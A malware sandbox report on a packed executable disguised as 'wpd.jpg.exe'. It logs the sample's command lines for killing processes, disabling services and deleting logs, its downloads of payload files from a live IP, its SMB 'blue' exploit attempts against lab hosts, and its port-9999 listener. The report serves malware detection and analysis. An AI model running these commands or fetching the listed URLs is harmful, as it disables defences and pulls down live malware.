Summary

Category	Machine	Started	Completed
ARCHIVE	s1_win7_x6403_us	June 7, 2024, 5:50 p.m.	June 7, 2024, 5:52 p.m.

Archive wpd.jpg.exe @ sandbox.zip

Size	8.4MB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`1bfe19a314dd31d6adda302f177c3b7c`
SHA1	`37fd59aa2c2b77c8757438075138f11eaedf81b8`
SHA256	`b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7`
SHA512	`b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638`
CRC32	`CD831527`
ssdeep	`196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub`
Yara	Network_Downloader - File Downloader PE_Header_Zero - PE File Signature IsPE32 - (no description)

wpd.jpg.exe "C:\Users\test22\AppData\Local\Temp\wpd.jpg.exe"
2076
- cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
  2164
  - taskkill.exe taskkill /f /im csrs.exe
    2240
  - sc.exe sc start netprofm
    2384
  - sc.exe sc config netprofm start= auto
    2456
  - sc.exe sc start NlaSvc
    2572
  - sc.exe sc config NlaSvc start= auto
    2644
- cmd.exe C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
  2740
  - net.exe net stop WinNsaSrv
    2784
    - net1.exe C:\Windows\system32\net1 stop WinNsaSrv
      2828
  - sc.exe sc config WinNsaSrv start= disabled
    2920
  - sc.exe sc stop 1MpsSvc
    2992
  - sc.exe sc config 1MpsSvc start= disabled
    3064
- cmd.exe C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
  3504
  - taskkill.exe taskkill /im csrs.exe /f
    3552
- csrs.exe csrs.exe -m 6 -t 200 -l 9999
  3712
  - csrs.exe csrs.exe -m 6 -t 200 -l 9999
    3756

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
104.37.187.182	Active	Moloch
139.5.177.32	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49758 -> 192.168.57.17:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.103:49844 -> 192.168.57.51:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.103:50021 -> 192.168.57.100:445	2001569	ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW June 7, 2024, 5:48 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW June 7, 2024, 5:52 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (50 out of 250 events)

Time & API	Arguments	Status	Return
WriteConsoleA June 7, 2024, 5:48 p.m.	buffer: get url: 104.37.187.182 success console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: ERROR: The process "csrs.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] StartService FAILED 1056: An instance of the service is already running. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] ChangeServiceConfig SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] StartService FAILED 1056: An instance of the service is already running. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] ChangeServiceConfig SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: 'sc1' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:52 p.m.	buffer: ERROR: The process "csrs.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:06,351 - DEBUG - console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:06,351 - INFO - ************** mode:6 addr: port:445 addrs: user: user file path: pwd: pwds: threads:200 cmd: batch file: listen port:9999 ************* console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:06,367 - INFO - parser user pwd dic... console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:06,367 - INFO - start attack... console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:06,367 - DEBUG - mixedAttack... console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: ecv total length: 8 console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: ecv empty data,break! console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,180 - INFO - blue attack target:192.168.56.103 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,180 - INFO - blue attack target:192.168.56.101 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,180 - INFO - check target:192.168.56.103 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,180 - INFO - check target:192.168.56.101 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,210 - INFO - 192.168.56.103 OS:Windows 7 Professional N 7601 Service Pack 1 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,226 - INFO - 192.168.56.103 is not patched console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,226 - INFO - spoolss: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,226 - INFO - samr: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,242 - INFO - netlogon: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,242 - INFO - lsarpc: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,257 - INFO - browser: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,257 - DEBUG - Target OS: Windows 7 Professional N 7601 Service Pack 1 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,289 - DEBUG - SMB1 session setup allocate nonpaged pool success console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,305 - DEBUG - SMB1 session setup allocate nonpaged pool success console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,305 - DEBUG - good response status: INVALID_PARAMETER console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,319 - INFO - blueAttack is finished! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,492 - INFO - exploit attack target:192.168.56.103 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,492 - INFO - exploitrth:0 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,507 - INFO - exploitrth:1 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,507 - INFO - exploit attack target:192.168.56.101 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,523 - INFO - exploitrth:2 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,523 - INFO - 192.168.56.103: Target OS: Windows 7 Professional N 7601 Service Pack 1 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,523 - INFO - exploitrth:3 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,539 - INFO - exploitrth:4 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,555 - DEBUG - 192.168.56.103 Not found accessible named pipe console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,555 - INFO - Failure::exploit attack target:192.168.56.103 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,555 - INFO - exploitrth:5 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:52 p.m.	buffer: 024-06-07 21:52:07,555 - INFO - exploitrth:6 started! console_handle: 0x0000000b	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 7, 2024, 5:52 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	xx0
section	xx1
section	xx2

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	BIN
resource name	TXT

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 7, 2024, 5:48 p.m.	stacktrace: wpd+0xb87553 @ 0xf87553 0x246 exception.instruction_r: 90 57 9c bf ad ba ac e1 66 f7 d7 66 f7 d7 66 81 exception.symbol: wpd+0xa66c71 exception.instruction: nop exception.module: wpd.jpg.exe exception.exception_code: 0x80000004 exception.offset: 10906737 exception.address: 0xe66c71 registers.esp: 849776 registers.edi: 15459136 registers.eax: 2716614981 registers.ebp: 851808 registers.edx: 79 registers.ebx: 4194304 registers.esi: 0 registers.ecx: 838	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (5 events)

Time & API	Arguments	Status	Return
bind June 7, 2024, 5:48 p.m.	ip_address: 0.0.0.0 socket: 948 port: 0	1	0
bind June 7, 2024, 5:52 p.m.	ip_address: socket: 436 port: 0	1	0
bind June 7, 2024, 5:52 p.m.	ip_address: 0.0.0.0 socket: 500 port: 9999	1	0
listen June 7, 2024, 5:52 p.m.	socket: 500 backlog: 5	1	0
accept June 7, 2024, 5:52 p.m.	ip_address: 127.0.0.1 socket: 500 port: 49838	1	516

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/xpxmr.txt
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/ok/wpd.html
suspicious_features	Connection to IP address	suspicious_request	GET http://104.37.187.182/wpdmd5.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://104.37.187.182/wpdtest.txt
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/ver.txt
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/shellver.txt

Performs some HTTP requests (6 events)

request	GET http://104.37.187.182/xpxmr.txt
request	GET http://104.37.187.182/ok/wpd.html
request	GET http://104.37.187.182/wpdmd5.txt
request	GET http://104.37.187.182/wpdtest.txt
request	GET http://104.37.187.182/ver.txt
request	GET http://104.37.187.182/shellver.txt

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 7, 2024, 5:48 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c10000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 7, 2024, 5:52 p.m.	process_identifier: 3756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0

Foreign language identified in PE resource (15 events)

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

TXT

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00eaeab8

size

0x0008d49b

name

RT_STRING

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00f3bf54

size

0x00000038

name

RT_VERSION

language

LANG_CHINESE

filetype

COM executable for DOS

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e0c350

size

0x000002b8

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll

Creates a suspicious process (3 events)

cmdline	C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline	C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline	C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto

Drops an executable to the user AppData folder (24 events)

file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util._counter.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES3.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\_hashlib.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._constant_time.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\_socket.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\select.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._MD4.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\_ssl.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\_cffi_backend.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Random.OSRNG.winrandom.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\pyexpat.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util.strxor.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._openssl.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._AES.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._SHA256.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._ARC4.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\bz2.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\_ctypes.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37122\unicodedata.pyd

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe")

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 7, 2024, 5:48 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x02c10000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'}

entropy

7.92303226231

description

A section with a high entropy has been found

entropy

0.99953363647

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 7, 2024, 5:48 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 7, 2024, 5:52 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (50 out of 1012 events)

url	https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url	http://wwwimages.adobe.com/www.adobe.com/swf/software/flash/about/flash_about_793x170.swf
url	https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg
url	https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F2020%2F1031%2Fupload_20063893240744871RiJjV.jpg%22
url	http://175.208.134.150:8282/test/test.eml
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/905.png
url	https://s.pstatic.net/static/www/mobile/edit/2020/1103/mobile_142459883835.gif
url	http://blogimgs.naver.net/nblog/guestbook/btn_close2.gif
url	https://ssl.pstatic.net/static/nid/login/rw_captcha01.png
url	http://www.snee.com/xml/xslt/sample.doc
url	https://s.pstatic.net/static/newsstand/up/2017/1122/nsd113655834.png
url	http://www.yceml.net/0559/10408495-1499411010011
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png
url	http://t.static.blog.naver.net/mylog/versioning/nhn.keywordHighlighter-99428789.js
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22
url	https://ssl.pstatic.net/static/pwe/nm/b.gif
url	https://castbox.shopping.naver.com/js/lazyload.js
url	https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url	https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png
url	https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F2020%2F1021%2Fupload_19201541624342101mWI1T.jpg%22
url	http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C
url	https://s.pstatic.net/shopping.phinf/20200720_22/e2297359-375a-403a-86c5-44ff86c708fc.jpg
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	https://s.pstatic.net/shopping.phinf/20201103_21/701f9083-a72b-4ef6-ac1c-0daf1907c51d.jpg?type=f214_292
url	https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png
url	https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png
url	https://www.google.com/pagead/drt/ui
url	https://s.pstatic.net/shopping.phinf/20201102_18/6131e135-0b61-4b61-86ca-480bf7612785.jpg
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/327.png
url	http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
url	https://mail.naver.com/js_src/com/nhncorp/mail/write/se2_new/smart_editor2_inputarea_ie8.html?version=20190704
url	https://static.nid.naver.com/loginv3/img/sp_login_20150113.gif
url	https://s.pstatic.net/static/newsstand/up/2017/0424/nsd172911723.png
url	https://tpc.googlesyndication.com/pagead/images/abg/icon.png
url	https://search.pstatic.net/common/?src=http%3A%2F%2Fcafefiles.naver.net%2FMjAxNzExMDdfODcg%2FMDAxNTEwMDY0OTYzNTA5.y-bJj3BgRC8r80hM6EblWFHSqawqo5-vMJAzHBN6rEkg.vAPtUzoeY8mHPRaMuejD3HrMtW5xgv-cdeEaAc0q2Rog.PNG.flashcs7%2FScreenshot_2017-11-07-22-55-08.png%23600x1024
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0804%2FcropImg_336x206_38466352545626545.png%22
url	https://www.naver.com
url	https://t1.daumcdn.net/tistory_admin/blogs/style/menubar.css?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	https://ssl.pstatic.net/static/nid/login/pc_2step_396_110.png
url	https://tpc.googlesyndication.com/pagead/js/r20180205/r20110914/abg.js
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/024.png
url	https://c.microsoft.com/ms.js
url	https://securepubads.g.doubleclick.net/tag/js/gpt.js
url	http://blogimgs.naver.net/nblog/skins/happybean/btn-put.gif
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/957.png
url	https://my.sendinblue.com/public/theme/version4/assets/images/loader_sblue.gif

Yara rule detected in process memory (50 out of 534 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	task schedule	rule	schtasks_Zero
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	task schedule	rule	schtasks_Zero
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo

Uses Windows utilities for basic Windows functionality (13 events)

cmdline	C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline	sc start NlaSvc
cmdline	taskkill /f /im csrs.exe
cmdline	sc config NlaSvc start= auto
cmdline	sc start netprofm
cmdline	sc stop 1MpsSvc
cmdline	taskkill /im csrs.exe /f
cmdline	C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline	sc config 1MpsSvc start= disabled
cmdline	C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
cmdline	sc config netprofm start= auto
cmdline	sc config WinNsaSrv start= disabled
cmdline	net stop WinNsaSrv

Communicates with host for which no DNS query was performed (2 events)

host	104.37.187.182
host	139.5.177.32

A process attempted to delay the analysis task. (2 events)

description	wpd.jpg.exe tried to sleep 207 seconds, actually delayed analysis time by 207 seconds
description	csrs.exe tried to sleep 1750 seconds, actually delayed analysis time by 1750 seconds

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (12 events)

url	http://175.208.134.150:8282/test/test.eml
url	http://104.37.187.182/ok/wpd.html
url	http://175.208.134.150:8282/favicon.ico
url	http://123.123.123.123
url	http://192.168.3.119/
url	http://104.37.187.182/wpdmd5.txt
